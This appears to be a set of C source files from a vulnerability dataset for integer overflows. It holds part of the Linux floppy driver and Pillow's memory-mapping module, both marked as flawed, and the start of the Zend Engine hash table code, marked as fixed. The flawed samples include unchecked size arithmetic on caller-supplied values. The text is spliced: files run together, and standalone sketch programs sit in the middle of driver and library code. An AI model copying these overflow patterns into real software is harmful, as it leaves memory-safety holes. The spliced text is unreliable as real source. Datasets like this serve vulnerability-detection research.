{
int fdc;
for (fdc = 0; fdc < N_FDC; fdc++)
if (FDCS->address != -1)
user_reset_fdc(-1, FD_RESET_ALWAYS, false);
return 0;
}
static const struct dev_pm_ops floppy_pm_ops = {
.resume = floppy_resume,
.restore = floppy_resume,
};
static struct platform_driver floppy_driver = {
.driver = {
.name = "floppy",
.pm = &floppy_pm_ops,
},
};
static const struct blk_mq_ops floppy_mq_ops = {
.queue_rq = floppy_queue_rq,
};
static struct platform_device floppy_device[N_DRIVE];
static bool floppy_available(int drive)
{
if (!(allowed_drive_mask & (1 << drive)))
return false;
if (fdc_state[FDC(drive)].version == FDC_NONE)
return false;
return true;
}
static struct kobject *floppy_find(dev_t dev, int *part, void *data)
{
int drive = (*part & 3) | ((*part & 0x80) >> 5);
if (drive >= N_DRIVE || !floppy_available(drive))
return NULL;
if (((*part >> 2) & 0x1f) >= ARRAY_SIZE(floppy_type))
return NULL;
*part = 0;
return get_disk_and_module(disks[drive]);
}
static int __init do_floppy_init(void)
{
int i, unit, drive, err;
set_debugt();
interruptjiffies = resultjiffies = jiffies;
#if defined(CONFIG_PPC)
if (check_legacy_ioport(FDC1))
return -ENODEV;
#endif
raw_cmd = NULL;
floppy_wq = alloc_ordered_workqueue("floppy", 0);
if (!floppy_wq)
return -ENOMEM;
for (drive = 0; drive < N_DRIVE; drive++) {
disks[drive] = alloc_disk(1);
if (!disks[drive]) {
err = -ENOMEM;
goto out_put_disk;
}
disks[drive]->queue = blk_mq_init_sq_queue(&tag_sets[drive],
&floppy_mq_ops, 2,
BLK_MQ_F_SHOULD_MERGE);
if (IS_ERR(disks[drive]->queue)) {
err = PTR_ERR(disks[drive]->queue);
disks[drive]->queue = NULL;
goto out_put_disk;
}
blk_queue_bounce_limit(disks[drive]->queue, BLK_BOUNCE_HIGH);
blk_queue_max_hw_sectors(disks[drive]->queue, 64);
disks[drive]->major = FLOPPY_MAJOR;
disks[drive]->first_minor = TOMINOR(drive);
disks[drive]->fops = &floppy_fops;
disks[drive]->events = DISK_EVENT_MEDIA_CHANGE;
sprintf(disks[drive]->disk_name, "fd%d", drive);
timer_setup(&motor_off_timer[drive], motor_off_callback, 0);
}
err = register_blkdev(FLOPPY_MAJOR, "fd");
if (err)
goto out_put_disk;
err = platform_driver_register(&floppy_driver);
if (err)
goto out_unreg_blkdev;
blk_register_region(MKDEV(FLOPPY_MAJOR, 0), 256, THIS_MODULE,
floppy_find, NULL, NULL);
for (i = 0; i < 256; i++)
if (ITYPE(i))
floppy_sizes[i] = floppy_type[ITYPE(i)].size;
else
floppy_sizes[i] = MAX_DISK_SIZE << 1;
reschedule_timeout(MAXTIMEOUT, "floppy init");
config_types();
for (i = 0; i < N_FDC; i++) {
fdc = i;
memset(FDCS, 0, sizeof(*FDCS));
FDCS->dtr = -1;
FDCS->dor = 0x4;
#if defined(__sparc__) || defined(__mc68000__)
/* sparc/sun3x don't have a DOR reset that we can fall back on */
#ifdef __mc68000__
if (MACH_IS_SUN3X)
#endif
FDCS->version = FDC_82072A;
#endif
}
use_virtual_dma = can_use_virtual_dma & 1;
fdc_state[0].address = FDC1;
if (fdc_state[0].address == -1) {
cancel_delayed_work(&fd_timeout);
err = -ENODEV;
goto out_unreg_region;
}
#if N_FDC > 1
fdc_state[1].address = FDC2;
#endif
fdc = 0; /* reset fdc in case of unexpected interrupt */
err = floppy_grab_irq_and_dma();
if (err) {
cancel_delayed_work(&fd_timeout);
err = -EBUSY;
goto out_unreg_region;
}
/* initialise drive state */
for (drive = 0; drive < N_DRIVE; drive++) {
memset(UDRS, 0, sizeof(*UDRS));
memset(UDRWE, 0, sizeof(*UDRWE));
set_bit(FD_DISK_NEWCHANGE_BIT, &UDRS->flags);
set_bit(FD_DISK_CHANGED_BIT, &UDRS->flags);
set_bit(FD_VERIFY_BIT, &UDRS->flags);
UDRS->fd_device = -1;
floppy_track_buffer = NULL;
max_buffer_sectors = 0;
}
/*
 * Small 10 ms delay to let any interrupt that initialization
 * might have triggered pass through, so it does not confuse
 * detection:
*/
msleep(10);
for (i = 0; i < N_FDC; i++) {
fdc = i;
FDCS->driver_version = FD_DRIVER_VERSION;
for (unit = 0; unit < 4; unit++)
FDCS->track[unit] = 0;
if (FDCS->address == -1)
continue;
FDCS->rawcmd = 2;
if (user_reset_fdc(-1, FD_RESET_ALWAYS, false)) {
/* free ioports reserved by floppy_grab_irq_and_dma() */
floppy_release_regions(fdc);
FDCS->address = -1;
FDCS->version = FDC_NONE;
continue;
}
/* Try to determine the floppy controller type */
FDCS->version = get_fdc_version();
if (FDCS->version == FDC_NONE) {
/* free ioports reserved by floppy_grab_irq_and_dma() */
floppy_release_regions(fdc);
FDCS->address = -1;
continue;
}
if (can_use_virtual_dma == 2 && FDCS->version < FDC_82072A)
can_use_virtual_dma = 0;
have_no_fdc = 0;
/* Not all FDCs seem to be able to handle the version command
* properly, so force a reset for the standard FDC clones,
* to avoid interrupt garbage.
*/
user_reset_fdc(-1, FD_RESET_ALWAYS, false);
}
fdc = 0;
cancel_delayed_work(&fd_timeout);
current_drive = 0;
initialized = true;
if (have_no_fdc) {
DPRINT("no floppy controllers found\n");
err = have_no_fdc;
goto out_release_dma;
}
for (drive = 0; drive < N_DRIVE; drive++) {
if (!floppy_available(drive))
continue;
floppy_device[drive].name = floppy_device_name;
floppy_device[drive].id = drive;
floppy_device[drive].dev.release = floppy_device_release;
floppy_device[drive].dev.groups = floppy_dev_groups;
err = platform_device_register(&floppy_device[drive]);
if (err)
goto out_remove_drives;
/* to be cleaned up... */
disks[drive]->private_data = (void *)(long)drive;
disks[drive]->flags |= GENHD_FL_REMOVABLE;
device_add_disk(&floppy_device[drive].dev, disks[drive], NULL);
}
return 0;
out_remove_drives:
while (drive--) {
if (floppy_available(drive)) {
del_gendisk(disks[drive]);
platform_device_unregister(&floppy_device[drive]);
}
}
out_release_dma:
if (atomic_read(&usage_count))
floppy_release_irq_and_dma();
out_unreg_region:
blk_unregister_region(MKDEV(FLOPPY_MAJOR, 0), 256);
platform_driver_unregister(&floppy_driver);
out_unreg_blkdev:
unregister_blkdev(FLOPPY_MAJOR, "fd");
out_put_disk:
destroy_workqueue(floppy_wq);
for (drive = 0; drive < N_DRIVE; drive++) {
if (!disks[drive])
break;
if (disks[drive]->queue) {
del_timer_sync(&motor_off_timer[drive]);
blk_cleanup_queue(disks[drive]->queue);
disks[drive]->queue = NULL;
blk_mq_free_tag_set(&tag_sets[drive]);
}
put_disk(disks[drive]);
}
return err;
}
#ifndef MODULE
static __init void floppy_async_init(void *data, async_cookie_t cookie)
{
do_floppy_init();
}
#endif
static int __init floppy_init(void)
{
#ifdef MODULE
return do_floppy_init();
#else
/* Don't hold up the bootup by the floppy initialization */
async_schedule(floppy_async_init, NULL);
return 0;
#endif
}
static const struct io_region {
int offset;
int size;
} io_regions[] = {
{ 2, 1 },
/* address + 3 is sometimes reserved by pnp bios for motherboard */
{ 4, 2 },
/* address + 6 is reserved, and may be taken by IDE.
 * Unfortunately, Adaptec doesn't know this :-( */
{ 7, 1 },
};
static void floppy_release_allocated_regions(int fdc, const struct io_region *p)
{
while (p != io_regions) {
p--;
release_region(FDCS->address + p->offset, p->size);
}
}
#define ARRAY_END(X) (&((X)[ARRAY_SIZE(X)]))
static int floppy_request_regions(int fdc)
{
const struct io_region *p;
for (p = io_regions; p < ARRAY_END(io_regions); p++) {
if (!request_region(FDCS->address + p->offset,
p->size, "floppy")) {
DPRINT("Floppy io-port 0x%04lx in use\n",
FDCS->address + p->offset);
floppy_release_allocated_regions(fdc, p);
return -EBUSY;
}
}
return 0;
}
static void floppy_release_regions(int fdc)
{
floppy_release_allocated_regions(fdc, ARRAY_END(io_regions));
}
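/*
 * Illustrative standalone sketch of the rollback pattern used by
 * floppy_request_regions()/floppy_release_allocated_regions() above: on a
 * failed acquisition, walk backwards from the failing entry so that only the
 * regions actually granted are released. acquire()/release() are stand-ins,
 * not the kernel request_region()/release_region() API.
 */
#include <stdbool.h>
#include <stdio.h>

struct region { int offset; int size; };

static const struct region regions[] = { { 2, 1 }, { 4, 2 }, { 7, 1 } };

#define REGIONS_END (&regions[sizeof(regions) / sizeof(regions[0])])

static bool acquire(const struct region *r)
{
	return r->offset != 4;	/* simulate the second region being busy */
}

static void release(const struct region *r)
{
	printf("released region at +%d\n", r->offset);
}

static void release_up_to(const struct region *p)
{
	while (p != regions) {
		p--;
		release(p);
	}
}

static int request_all(void)
{
	const struct region *p;

	for (p = regions; p < REGIONS_END; p++) {
		if (!acquire(p)) {
			release_up_to(p);	/* undo only what was granted */
			return -1;
		}
	}
	return 0;
}

int main(void)
{
	return request_all() ? 1 : 0;
}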
static int floppy_grab_irq_and_dma(void)
{
if (atomic_inc_return(&usage_count) > 1)
return 0;
/*
 * We might have scheduled a free_irq(); wait for it to
 * drain first:
*/
flush_workqueue(floppy_wq);
if (fd_request_irq()) {
DPRINT("Unable to grab IRQ%d for the floppy driver\n",
FLOPPY_IRQ);
atomic_dec(&usage_count);
return -1;
}
if (fd_request_dma()) {
DPRINT("Unable to grab DMA%d for the floppy driver\n",
FLOPPY_DMA);
if (can_use_virtual_dma & 2)
use_virtual_dma = can_use_virtual_dma = 1;
if (!(can_use_virtual_dma & 1)) {
fd_free_irq();
atomic_dec(&usage_count);
return -1;
}
}
for (fdc = 0; fdc < N_FDC; fdc++) {
if (FDCS->address != -1) {
if (floppy_request_regions(fdc))
goto cleanup;
}
}
for (fdc = 0; fdc < N_FDC; fdc++) {
if (FDCS->address != -1) {
reset_fdc_info(1);
fd_outb(FDCS->dor, FD_DOR);
}
}
fdc = 0;
set_dor(0, ~0, 8); /* avoid immediate interrupt */
for (fdc = 0; fdc < N_FDC; fdc++)
if (FDCS->address != -1)
fd_outb(FDCS->dor, FD_DOR);
/*
 * The driver will try to free resources and relies on us
 * to know whether they were allocated or not.
*/
fdc = 0;
irqdma_allocated = 1;
return 0;
cleanup:
fd_free_irq();
fd_free_dma();
while (--fdc >= 0)
floppy_release_regions(fdc);
atomic_dec(&usage_count);
return -1;
}
static void floppy_release_irq_and_dma(void)
{
int old_fdc;
#ifndef __sparc__
int drive;
#endif
long tmpsize;
unsigned long tmpaddr;
if (!atomic_dec_and_test(&usage_count))
return;
if (irqdma_allocated) {
fd_disable_dma();
fd_free_dma();
fd_free_irq();
irqdma_allocated = 0;
}
set_dor(0, ~0, 8);
#if N_FDC > 1
set_dor(1, ~8, 0);
#endif
if (floppy_track_buffer && max_buffer_sectors) {
tmpsize = max_buffer_sectors * 1024;
tmpaddr = (unsigned long)floppy_track_buffer;
floppy_track_buffer = NULL;
max_buffer_sectors = 0;
buffer_min = buffer_max = -1;
fd_dma_mem_free(tmpaddr, tmpsize);
}
#ifndef __sparc__
for (drive = 0; drive < N_FDC * 4; drive++)
if (timer_pending(motor_off_timer + drive))
pr_info("motor off timer %d still active\n", drive);
#endif
if (delayed_work_pending(&fd_timeout))
pr_info("floppy timer still active:%s\n", timeout_message);
if (delayed_work_pending(&fd_timer))
pr_info("auxiliary floppy timer still active\n");
if (work_pending(&floppy_work))
pr_info("work still pending\n");
old_fdc = fdc;
for (fdc = 0; fdc < N_FDC; fdc++)
if (FDCS->address != -1)
floppy_release_regions(fdc);
fdc = old_fdc;
}
#ifdef MODULE
static char *floppy;
static void __init parse_floppy_cfg_string(char *cfg)
{
char *ptr;
while (*cfg) {
ptr = cfg;
while (*cfg && *cfg != ' ' && *cfg != '\t')
cfg++;
if (*cfg) {
*cfg = '\0';
cfg++;
}
if (*ptr)
floppy_setup(ptr);
}
}
static int __init floppy_module_init(void)
{
if (floppy)
parse_floppy_cfg_string(floppy);
return floppy_init();
}
module_init(floppy_module_init);
static void __exit floppy_module_exit(void)
{
int drive;
blk_unregister_region(MKDEV(FLOPPY_MAJOR, 0), 256);
unregister_blkdev(FLOPPY_MAJOR, "fd");
platform_driver_unregister(&floppy_driver);
destroy_workqueue(floppy_wq);
for (drive = 0; drive < N_DRIVE; drive++) {
del_timer_sync(&motor_off_timer[drive]);
if (floppy_available(drive)) {
del_gendisk(disks[drive]);
platform_device_unregister(&floppy_device[drive]);
}
blk_cleanup_queue(disks[drive]->queue);
blk_mq_free_tag_set(&tag_sets[drive]);
/*
* These disks have not called add_disk(). Don't put down
* queue reference in put_disk().
*/
if (!(allowed_drive_mask & (1 << drive)) ||
fdc_state[FDC(drive)].version == FDC_NONE)
disks[drive]->queue = NULL;
put_disk(disks[drive]);
}
cancel_delayed_work_sync(&fd_timeout);
cancel_delayed_work_sync(&fd_timer);
if (atomic_read(&usage_count))
floppy_release_irq_and_dma();
/* eject disk, if any */
fd_eject(0);
}
module_exit(floppy_module_exit);
module_param(floppy, charp, 0);
module_param(FLOPPY_IRQ, int, 0);
module_param(FLOPPY_DMA, int, 0);
MODULE_AUTHOR("Alain L. Knaff");
MODULE_SUPPORTED_DEVICE("fd");
MODULE_LICENSE("GPL");
/* This doesn't actually get used other than for module information */
static const struct pnp_device_id floppy_pnpids[] = {
{"PNP0700", 0},
{}
};
MODULE_DEVICE_TABLE(pnp, floppy_pnpids);
#else
__setup("floppy=", floppy_setup);
module_init(floppy_init)
#endif
MODULE_ALIAS_BLOCKDEV_MAJOR(FLOPPY_MAJOR);
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_966_0 |
crossvul-cpp_data_bad_5395_2 | /*
* The Python Imaging Library.
*
* standard memory mapping interface for the Imaging library
*
* history:
* 1998-03-05 fl added Win32 read mapping
* 1999-02-06 fl added "I;16" support
* 2003-04-21 fl added PyImaging_MapBuffer primitive
*
* Copyright (c) 1998-2003 by Secret Labs AB.
* Copyright (c) 2003 by Fredrik Lundh.
*
* See the README file for information on usage and redistribution.
*/
/*
* FIXME: should move the memory mapping primitives into libImaging!
*/
#include "Python.h"
#include "Imaging.h"
#include "py3.h"
/* compatibility wrappers (defined in _imaging.c) */
extern int PyImaging_CheckBuffer(PyObject* buffer);
extern int PyImaging_GetBuffer(PyObject* buffer, Py_buffer *view);
/* -------------------------------------------------------------------- */
/* Standard mapper */
typedef struct {
PyObject_HEAD
char* base;
int size;
int offset;
#ifdef _WIN32
HANDLE hFile;
HANDLE hMap;
#endif
} ImagingMapperObject;
static PyTypeObject ImagingMapperType;
ImagingMapperObject*
PyImaging_MapperNew(const char* filename, int readonly)
{
ImagingMapperObject *mapper;
if (PyType_Ready(&ImagingMapperType) < 0)
return NULL;
mapper = PyObject_New(ImagingMapperObject, &ImagingMapperType);
if (mapper == NULL)
return NULL;
mapper->base = NULL;
mapper->size = mapper->offset = 0;
#ifdef _WIN32
mapper->hFile = (HANDLE)-1;
mapper->hMap = (HANDLE)-1;
/* FIXME: currently supports readonly mappings only */
mapper->hFile = CreateFile(
filename,
GENERIC_READ,
FILE_SHARE_READ,
NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (mapper->hFile == (HANDLE)-1) {
PyErr_SetString(PyExc_IOError, "cannot open file");
Py_DECREF(mapper);
return NULL;
}
mapper->hMap = CreateFileMapping(
mapper->hFile, NULL,
PAGE_READONLY,
0, 0, NULL);
if (mapper->hMap == (HANDLE)-1) {
CloseHandle(mapper->hFile);
PyErr_SetString(PyExc_IOError, "cannot map file");
Py_DECREF(mapper);
return NULL;
}
mapper->base = (char*) MapViewOfFile(
mapper->hMap,
FILE_MAP_READ,
0, 0, 0);
mapper->size = GetFileSize(mapper->hFile, 0);
#endif
return mapper;
}
static void
mapping_dealloc(ImagingMapperObject* mapper)
{
#ifdef _WIN32
if (mapper->base != 0)
UnmapViewOfFile(mapper->base);
if (mapper->hMap != (HANDLE)-1)
CloseHandle(mapper->hMap);
if (mapper->hFile != (HANDLE)-1)
CloseHandle(mapper->hFile);
mapper->base = 0;
mapper->hMap = mapper->hFile = (HANDLE)-1;
#endif
PyObject_Del(mapper);
}
/* -------------------------------------------------------------------- */
/* standard file operations */
static PyObject*
mapping_read(ImagingMapperObject* mapper, PyObject* args)
{
PyObject* buf;
int size = -1;
if (!PyArg_ParseTuple(args, "|i", &size))
return NULL;
/* check size */
if (size < 0 || mapper->offset + size > mapper->size)
size = mapper->size - mapper->offset;
if (size < 0)
size = 0;
buf = PyBytes_FromStringAndSize(NULL, size);
if (!buf)
return NULL;
if (size > 0) {
memcpy(PyBytes_AsString(buf), mapper->base + mapper->offset, size);
mapper->offset += size;
}
return buf;
}
static PyObject*
mapping_seek(ImagingMapperObject* mapper, PyObject* args)
{
int offset;
int whence = 0;
if (!PyArg_ParseTuple(args, "i|i", &offset, &whence))
return NULL;
switch (whence) {
case 0: /* SEEK_SET */
mapper->offset = offset;
break;
case 1: /* SEEK_CUR */
mapper->offset += offset;
break;
case 2: /* SEEK_END */
mapper->offset = mapper->size + offset;
break;
default:
/* FIXME: raise ValueError? */
break;
}
Py_INCREF(Py_None);
return Py_None;
}
/* -------------------------------------------------------------------- */
/* map entire image */
extern PyObject*PyImagingNew(Imaging im);
static void
ImagingDestroyMap(Imaging im)
{
return; /* nothing to do! */
}
static PyObject*
mapping_readimage(ImagingMapperObject* mapper, PyObject* args)
{
int y, size;
Imaging im;
char* mode;
int xsize;
int ysize;
int stride;
int orientation;
if (!PyArg_ParseTuple(args, "s(ii)ii", &mode, &xsize, &ysize,
&stride, &orientation))
return NULL;
if (stride <= 0) {
/* FIXME: maybe we should call ImagingNewPrologue instead */
if (!strcmp(mode, "L") || !strcmp(mode, "P"))
stride = xsize;
else if (!strcmp(mode, "I;16") || !strcmp(mode, "I;16B"))
stride = xsize * 2;
else
stride = xsize * 4;
}
size = ysize * stride;
if (mapper->offset + size > mapper->size) {
PyErr_SetString(PyExc_IOError, "image file truncated");
return NULL;
}
im = ImagingNewPrologue(mode, xsize, ysize);
if (!im)
return NULL;
/* setup file pointers */
if (orientation > 0)
for (y = 0; y < ysize; y++)
im->image[y] = mapper->base + mapper->offset + y * stride;
else
for (y = 0; y < ysize; y++)
im->image[ysize-y-1] = mapper->base + mapper->offset + y * stride;
im->destroy = ImagingDestroyMap;
if (!ImagingNewEpilogue(im))
return NULL;
mapper->offset += size;
return PyImagingNew(im);
}
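/*
 * Aside, not part of the original mapping code: "size = ysize * stride"
 * above is a plain int multiplication of externally supplied values. A
 * minimal, portable sketch of an overflow-checked multiply; the helper name
 * checked_mul_int is hypothetical.
 */
#include <limits.h>
#include <stdio.h>

static int checked_mul_int(int a, int b, int *out)
{
    if (a < 0 || b < 0)
        return -1;                      /* reject negative dimensions */
    if (b != 0 && a > INT_MAX / b)
        return -1;                      /* a * b would overflow int */
    *out = a * b;
    return 0;
}

int main(void)
{
    int size;

    if (checked_mul_int(65536, 65536, &size) != 0)
        printf("65536 * 65536 would overflow int\n");
    return 0;
}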
static struct PyMethodDef methods[] = {
/* standard file interface */
{"read", (PyCFunction)mapping_read, 1},
{"seek", (PyCFunction)mapping_seek, 1},
/* extensions */
{"readimage", (PyCFunction)mapping_readimage, 1},
{NULL, NULL} /* sentinel */
};
static PyTypeObject ImagingMapperType = {
PyVarObject_HEAD_INIT(NULL, 0)
"ImagingMapper", /*tp_name*/
sizeof(ImagingMapperObject), /*tp_size*/
0, /*tp_itemsize*/
/* methods */
(destructor)mapping_dealloc, /*tp_dealloc*/
0, /*tp_print*/
0, /*tp_getattr*/
0, /*tp_setattr*/
0, /*tp_compare*/
0, /*tp_repr*/
0, /*tp_as_number */
0, /*tp_as_sequence */
0, /*tp_as_mapping */
0, /*tp_hash*/
0, /*tp_call*/
0, /*tp_str*/
0, /*tp_getattro*/
0, /*tp_setattro*/
0, /*tp_as_buffer*/
Py_TPFLAGS_DEFAULT, /*tp_flags*/
0, /*tp_doc*/
0, /*tp_traverse*/
0, /*tp_clear*/
0, /*tp_richcompare*/
0, /*tp_weaklistoffset*/
0, /*tp_iter*/
0, /*tp_iternext*/
methods, /*tp_methods*/
0, /*tp_members*/
0, /*tp_getset*/
};
PyObject*
PyImaging_Mapper(PyObject* self, PyObject* args)
{
char* filename;
if (!PyArg_ParseTuple(args, "s", &filename))
return NULL;
return (PyObject*) PyImaging_MapperNew(filename, 1);
}
/* -------------------------------------------------------------------- */
/* Buffer mapper */
typedef struct ImagingBufferInstance {
struct ImagingMemoryInstance im;
PyObject* target;
Py_buffer view;
} ImagingBufferInstance;
static void
mapping_destroy_buffer(Imaging im)
{
ImagingBufferInstance* buffer = (ImagingBufferInstance*) im;
PyBuffer_Release(&buffer->view);
Py_XDECREF(buffer->target);
}
PyObject*
PyImaging_MapBuffer(PyObject* self, PyObject* args)
{
Py_ssize_t y, size;
Imaging im;
PyObject* target;
Py_buffer view;
char* mode;
char* codec;
PyObject* bbox;
Py_ssize_t offset;
int xsize, ysize;
int stride;
int ystep;
if (!PyArg_ParseTuple(args, "O(ii)sOn(sii)", &target, &xsize, &ysize,
&codec, &bbox, &offset, &mode, &stride, &ystep))
return NULL;
if (!PyImaging_CheckBuffer(target)) {
PyErr_SetString(PyExc_TypeError, "expected string or buffer");
return NULL;
}
if (stride <= 0) {
if (!strcmp(mode, "L") || !strcmp(mode, "P"))
stride = xsize;
else if (!strncmp(mode, "I;16", 4))
stride = xsize * 2;
else
stride = xsize * 4;
}
size = (Py_ssize_t) ysize * stride;
/* check buffer size */
if (PyImaging_GetBuffer(target, &view) < 0)
return NULL;
if (view.len < 0) {
PyErr_SetString(PyExc_ValueError, "buffer has negative size");
return NULL;
}
if (offset + size > view.len) {
PyErr_SetString(PyExc_ValueError, "buffer is not large enough");
return NULL;
}
im = ImagingNewPrologueSubtype(
mode, xsize, ysize, sizeof(ImagingBufferInstance)
);
if (!im)
return NULL;
/* setup file pointers */
if (ystep > 0)
for (y = 0; y < ysize; y++)
im->image[y] = (char*)view.buf + offset + y * stride;
else
for (y = 0; y < ysize; y++)
im->image[ysize-y-1] = (char*)view.buf + offset + y * stride;
im->destroy = mapping_destroy_buffer;
Py_INCREF(target);
((ImagingBufferInstance*) im)->target = target;
((ImagingBufferInstance*) im)->view = view;
if (!ImagingNewEpilogue(im))
return NULL;
return PyImagingNew(im);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_5395_2 |
crossvul-cpp_data_good_3089_0 | /*
+----------------------------------------------------------------------+
| Zend Engine |
+----------------------------------------------------------------------+
| Copyright (c) 1998-2016 Zend Technologies Ltd. (http://www.zend.com) |
+----------------------------------------------------------------------+
| This source file is subject to version 2.00 of the Zend license, |
| that is bundled with this package in the file LICENSE, and is |
| available through the world-wide-web at the following url: |
| http://www.zend.com/license/2_00.txt. |
| If you did not receive a copy of the Zend license and are unable to |
| obtain it through the world-wide-web, please send a note to |
| license@zend.com so we can mail you a copy immediately. |
+----------------------------------------------------------------------+
| Authors: Andi Gutmans <andi@zend.com> |
| Zeev Suraski <zeev@zend.com> |
| Dmitry Stogov <dmitry@zend.com> |
+----------------------------------------------------------------------+
*/
/* $Id$ */
#include "zend.h"
#include "zend_globals.h"
#include "zend_variables.h"
#define HT_DEBUG 0
#if HT_DEBUG
# define HT_ASSERT(c) ZEND_ASSERT(c)
#else
# define HT_ASSERT(c)
#endif
#define HT_POISONED_PTR ((HashTable *) (intptr_t) -1)
#if ZEND_DEBUG
/*
#define HASH_MASK_CONSISTENCY 0xc0
*/
#define HT_OK 0x00
#define HT_IS_DESTROYING 0x40
#define HT_DESTROYED 0x80
#define HT_CLEANING 0xc0
static void _zend_is_inconsistent(const HashTable *ht, const char *file, int line)
{
if ((ht->u.flags & HASH_MASK_CONSISTENCY) == HT_OK) {
return;
}
switch ((ht->u.flags & HASH_MASK_CONSISTENCY)) {
case HT_IS_DESTROYING:
zend_output_debug_string(1, "%s(%d) : ht=%p is being destroyed", file, line, ht);
break;
case HT_DESTROYED:
zend_output_debug_string(1, "%s(%d) : ht=%p is already destroyed", file, line, ht);
break;
case HT_CLEANING:
zend_output_debug_string(1, "%s(%d) : ht=%p is being cleaned", file, line, ht);
break;
default:
zend_output_debug_string(1, "%s(%d) : ht=%p is inconsistent", file, line, ht);
break;
}
zend_bailout();
}
#define IS_CONSISTENT(a) _zend_is_inconsistent(a, __FILE__, __LINE__);
#define SET_INCONSISTENT(n) do { \
(ht)->u.flags |= n; \
} while (0)
#else
#define IS_CONSISTENT(a)
#define SET_INCONSISTENT(n)
#endif
#define HASH_PROTECT_RECURSION(ht) \
if ((ht)->u.flags & HASH_FLAG_APPLY_PROTECTION) { \
if (((ht)->u.flags & ZEND_HASH_APPLY_COUNT_MASK) >= (3 << 8)) { \
zend_error_noreturn(E_ERROR, "Nesting level too deep - recursive dependency?");\
} \
ZEND_HASH_INC_APPLY_COUNT(ht); \
}
#define HASH_UNPROTECT_RECURSION(ht) \
if ((ht)->u.flags & HASH_FLAG_APPLY_PROTECTION) { \
ZEND_HASH_DEC_APPLY_COUNT(ht); \
}
#define ZEND_HASH_IF_FULL_DO_RESIZE(ht) \
if ((ht)->nNumUsed >= (ht)->nTableSize) { \
zend_hash_do_resize(ht); \
}
static void ZEND_FASTCALL zend_hash_do_resize(HashTable *ht);
static uint32_t zend_always_inline zend_hash_check_size(uint32_t nSize)
{
#if defined(ZEND_WIN32)
unsigned long index;
#endif
/* Round up to a big enough power of 2. */
/* The size should be between HT_MIN_SIZE and HT_MAX_SIZE. */
if (nSize < HT_MIN_SIZE) {
nSize = HT_MIN_SIZE;
} else if (UNEXPECTED(nSize >= HT_MAX_SIZE)) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", nSize, sizeof(Bucket), sizeof(Bucket));
}
#if defined(ZEND_WIN32)
if (BitScanReverse(&index, nSize - 1)) {
return 0x2 << ((31 - index) ^ 0x1f);
} else {
/* nSize is ensured to be in the valid range, so fall back to it
   rather than using an undefined bit scan result. */
return nSize;
}
#elif (defined(__GNUC__) || __has_builtin(__builtin_clz)) && defined(PHP_HAVE_BUILTIN_CLZ)
return 0x2 << (__builtin_clz(nSize - 1) ^ 0x1f);
#else
nSize -= 1;
nSize |= (nSize >> 1);
nSize |= (nSize >> 2);
nSize |= (nSize >> 4);
nSize |= (nSize >> 8);
nSize |= (nSize >> 16);
return nSize + 1;
#endif
}
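/*
 * Minimal standalone sketch of the portable fallback path above: round a
 * 32-bit value up to the next power of two by smearing the high bit down.
 * The HT_MIN_SIZE/HT_MAX_SIZE clamping that zend_hash_check_size() performs
 * first is omitted here (so a zero input is not handled).
 */
#include <stdint.h>
#include <stdio.h>

static uint32_t round_up_pow2(uint32_t n)
{
	n -= 1;
	n |= n >> 1;
	n |= n >> 2;
	n |= n >> 4;
	n |= n >> 8;
	n |= n >> 16;
	return n + 1;
}

int main(void)
{
	printf("%u -> %u\n", 9u, round_up_pow2(9));	/* 16 */
	printf("%u -> %u\n", 64u, round_up_pow2(64));	/* 64 */
	return 0;
}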
static void zend_always_inline zend_hash_real_init_ex(HashTable *ht, int packed)
{
HT_ASSERT(GC_REFCOUNT(ht) == 1);
ZEND_ASSERT(!((ht)->u.flags & HASH_FLAG_INITIALIZED));
if (packed) {
HT_SET_DATA_ADDR(ht, pemalloc(HT_SIZE(ht), (ht)->u.flags & HASH_FLAG_PERSISTENT));
(ht)->u.flags |= HASH_FLAG_INITIALIZED | HASH_FLAG_PACKED;
HT_HASH_RESET_PACKED(ht);
} else {
(ht)->nTableMask = -(ht)->nTableSize;
HT_SET_DATA_ADDR(ht, pemalloc(HT_SIZE(ht), (ht)->u.flags & HASH_FLAG_PERSISTENT));
(ht)->u.flags |= HASH_FLAG_INITIALIZED;
if (EXPECTED(ht->nTableMask == -8)) {
Bucket *arData = ht->arData;
HT_HASH_EX(arData, -8) = -1;
HT_HASH_EX(arData, -7) = -1;
HT_HASH_EX(arData, -6) = -1;
HT_HASH_EX(arData, -5) = -1;
HT_HASH_EX(arData, -4) = -1;
HT_HASH_EX(arData, -3) = -1;
HT_HASH_EX(arData, -2) = -1;
HT_HASH_EX(arData, -1) = -1;
} else {
HT_HASH_RESET(ht);
}
}
}
static void zend_always_inline zend_hash_check_init(HashTable *ht, int packed)
{
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (UNEXPECTED(!((ht)->u.flags & HASH_FLAG_INITIALIZED))) {
zend_hash_real_init_ex(ht, packed);
}
}
#define CHECK_INIT(ht, packed) \
zend_hash_check_init(ht, packed)
static const uint32_t uninitialized_bucket[-HT_MIN_MASK] =
{HT_INVALID_IDX, HT_INVALID_IDX};
ZEND_API void ZEND_FASTCALL _zend_hash_init(HashTable *ht, uint32_t nSize, dtor_func_t pDestructor, zend_bool persistent ZEND_FILE_LINE_DC)
{
GC_REFCOUNT(ht) = 1;
GC_TYPE_INFO(ht) = IS_ARRAY;
ht->u.flags = (persistent ? HASH_FLAG_PERSISTENT : 0) | HASH_FLAG_APPLY_PROTECTION | HASH_FLAG_STATIC_KEYS;
ht->nTableMask = HT_MIN_MASK;
HT_SET_DATA_ADDR(ht, &uninitialized_bucket);
ht->nNumUsed = 0;
ht->nNumOfElements = 0;
ht->nInternalPointer = HT_INVALID_IDX;
ht->nNextFreeElement = 0;
ht->pDestructor = pDestructor;
ht->nTableSize = zend_hash_check_size(nSize);
}
static void ZEND_FASTCALL zend_hash_packed_grow(HashTable *ht)
{
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->nTableSize >= HT_MAX_SIZE) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", ht->nTableSize * 2, sizeof(Bucket), sizeof(Bucket));
}
HANDLE_BLOCK_INTERRUPTIONS();
ht->nTableSize += ht->nTableSize;
HT_SET_DATA_ADDR(ht, perealloc2(HT_GET_DATA_ADDR(ht), HT_SIZE(ht), HT_USED_SIZE(ht), ht->u.flags & HASH_FLAG_PERSISTENT));
HANDLE_UNBLOCK_INTERRUPTIONS();
}
